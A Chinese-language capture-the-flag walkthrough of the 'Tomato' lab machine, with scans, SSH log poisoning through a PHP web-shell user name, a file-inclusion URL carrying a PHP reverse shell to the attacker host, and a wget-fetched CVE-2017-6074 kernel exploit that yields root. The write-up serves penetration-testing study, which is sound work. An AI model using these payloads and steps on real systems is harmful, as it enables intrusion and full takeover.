TOMATO
2023-02-01 本文已影响0人
Tess鱼丸
一. 网络扫描
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:eb:da:c6, IPv4: 192.168.10.100
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1 00:50:56:c0:00:08 VMware, Inc.
192.168.10.1 00:50:56:ff:c4:ee VMware, Inc. (DUP: 2)
192.168.10.12 00:0c:29:bd:58:5d VMware, Inc.
192.168.10.254 00:50:56:fa:e3:28 VMware, Inc.
二、靶机端口扫描
┌──(root㉿kali)-[~]
└─# nmap -p- 192.168.10.12
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-30 08:04 EST
Nmap scan report for 192.168.10.10
Host is up (0.00066s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
2211/tcp open emwin
8888/tcp open sun-answerbook
MAC Address: 00:0C:29:BD:58:5D (VMware)
┌──(root㉿kali)-[~]
└─# nmap -p21,80,2211,8888 -A 192.168.10.12
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-30 08:07 EST
Nmap scan report for 192.168.10.10
Host is up (0.00026s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Tomato
|_http-server-header: Apache/2.4.18 (Ubuntu)
2211/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:53:0a:91:8c:f1:a6:10:11:0d:9e:0f:22:f8:49:8e (RSA)
| 256 b3:12:60:32:48:28:eb:ac:80:de:17:d7:96:77:6e:2f (ECDSA)
|_ 256 36:6f:52:ad:fe:f7:92:3e:a2:51:0f:73:06:8d:80:13 (ED25519)
8888/tcp open http nginx 1.10.3 (Ubuntu)
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Private Property
|_http-server-header: nginx/1.10.3 (Ubuntu)
MAC Address: 00:0C:29:BD:58:5D (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.26 ms 192.168.10.12
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.63 seconds
三、Web信息收集
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.10.12 -f -e html.php.txt
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: html.php.txt | HTTP method: GET | Threads: 30 | Wordlist size: 13612
Output File: /root/.dirsearch/reports/192.168.10.12/_23-01-30_08-13-44.txt
Error Log: /root/.dirsearch/logs/errors-23-01-30_08-13-44.log
Target: http://192.168.10.12/
[08:13:44] Starting:
[08:13:45] 403 - 278B - /.ht_wsr.txt
[08:13:45] 403 - 278B - /.htaccess.save
[08:13:45] 403 - 278B - /.htaccess_orig
[08:13:45] 403 - 278B - /.htaccess.bak1
[08:13:45] 403 - 278B - /.htaccess.orig
[08:13:45] 403 - 278B - /.htaccess.sample
[08:13:45] 403 - 278B - /.htaccess_extra
[08:13:45] 403 - 278B - /.htaccessOLD2
[08:13:45] 403 - 278B - /.htaccess_sc
[08:13:45] 403 - 278B - /.htm
[08:13:45] 403 - 278B - /.htaccessOLD
[08:13:45] 403 - 278B - /.html
[08:13:45] 403 - 278B - /.htpasswds
[08:13:45] 403 - 278B - /.httr-oauth
[08:13:45] 403 - 278B - /.htpasswd_test
[08:13:45] 403 - 278B - /.php
[08:13:45] 403 - 278B - /.php3
[08:13:45] 403 - 278B - /.htaccessBAK
[08:13:59] 403 - 278B - /icons/
[08:14:00] 200 - 652B - /index.html
[08:14:08] 403 - 278B - /server-status
[08:14:08] 403 - 278B - /server-status/
发现隐藏目录
┌──(root㉿kali)-[~]
└─# apt install seclists
正在读取软件包列表... 完成
正在分析软件包的依赖关系树... 完成
正在读取状态信息... 完成
下列【新】软件包将被安装:
seclists
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.10.12 -w /usr/share/seclists/Discovery/Web-Content/common.txt
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 4713
Output File: /root/.dirsearch/reports/192.168.10.12/_23-01-30_08-26-17.txt
Error Log: /root/.dirsearch/logs/errors-23-01-30_08-26-17.log
Target: http://192.168.10.12/
[08:26:17] Starting:
[08:26:18] 301 - 322B - /antibot_image -> http://192.168.10.12/antibot_image/
[08:26:20] 200 - 652B - /index.html
[08:26:24] 403 - 278B - /server-status
Task Completed
发现info.php中存在(文件包含漏洞)
┌──(root㉿kali)-[~]
└─# ssh '<?php system($_GET['shell']);?>'@192.168.10.12
<?php system($_GET[shell]);?>@192.168.10.12's password:
Permission denied, please try again.
<?php system($_GET[shell]);?>@192.168.10.12's password:
Permission denied, please try again.
<?php system($_GET[shell]);?>@192.168.10.12's password:
<?php system($_GET[shell]);?>@192.168.10.12: Permission denied (publickey,password).
这样'<?php system($_GET['shell']); ?>'该用户就会被记录到ssh的日志中去
开启nc监听
nc -lvnp 3388
构建反弹shell
http://192.168.10.12/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&shell=php -r '$sock=fsockopen("192.168.10.100",3388);exec("/bin/sh -i <&3 >&3 2>&3");'
编码后
http://192.168.10.12/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&shell=php+-r+%27%24sock%3dfsockopen(%22192.168.10.100%22%2c3388)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27
访问URL,成功反弹shell
┌──(root㉿kali)-[~]
└─# nc -lvnp 3388
listening on [any] 3388 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.10] 57358
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$
3、提权
首先建立可交互式shell,
python3 -c "import pty;pty.spawn('/bin/bash')"
查看linux内核版本,
uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
找这个版本的exp,
编译后上传到目标主机,但是编译后的文件上传到本机执行会报./CVE-2017-6074: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found,无法执行,
解决办法是需要把.c原文件传到靶机里再编译后执行,
就拿到了root权限。
$
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/var/www/html/antibot_image/antibots$
www-data@ubuntu:/var/www/html/antibot_image/antibots$ cd /tmp
www-data@ubuntu:/tmp$ wget http://192.168.10.100:8000/CVE-2017-6074.c
wget http://192.168.10.100:8000/CVE-2017-6074.c
--2023-02-01 11:05:53-- http://192.168.10.100:8000/CVE-2017-6074.c
Connecting to 192.168.10.100:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16554 (16K) [text/x-csrc]
Saving to: 'CVE-2017-6074.c'
CVE-2017-6074.c 100%[===================>] 16.17K --.-KB/s in 0s
2023-02-01 11:05:53 (34.7 MB/s) - 'CVE-2017-6074.c' saved [16554/16554]
www-data@ubuntu:/tmp$
www-data@ubuntu:/tmp$ gcc CVE-2017-6074.c
gcc CVE-2017-6074.c
www-data@ubuntu:/tmp$ ./a.out
./a.out
[.] namespace sandbox setup successfully
[.] disabling SMEP & SMAP
[.] scheduling 0xffffffff81064560(0x406e0)
[.] waiting for the timer to execute
[.] done
[.] SMEP & SMAP should be off now
[.] getting root
[.] executing 0x402043
[.] done
[.] should be root now
[.] checking if we got root
[+] got r00t ^_^
[!] don t kill the exploit binary, the kernel will crash
root@ubuntu:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/tmp# whoami
whoami
root
root@ubuntu:/tmp# cd ~
cd ~
root@ubuntu:/root# ls
ls
0 gcc glibc-2.34 proof.txt
root@ubuntu:/root# cat proof.txt
cat proof.txt
Sun_CSR_TEAM_TOMATO_JS_0232xx23
root@ubuntu:/root#
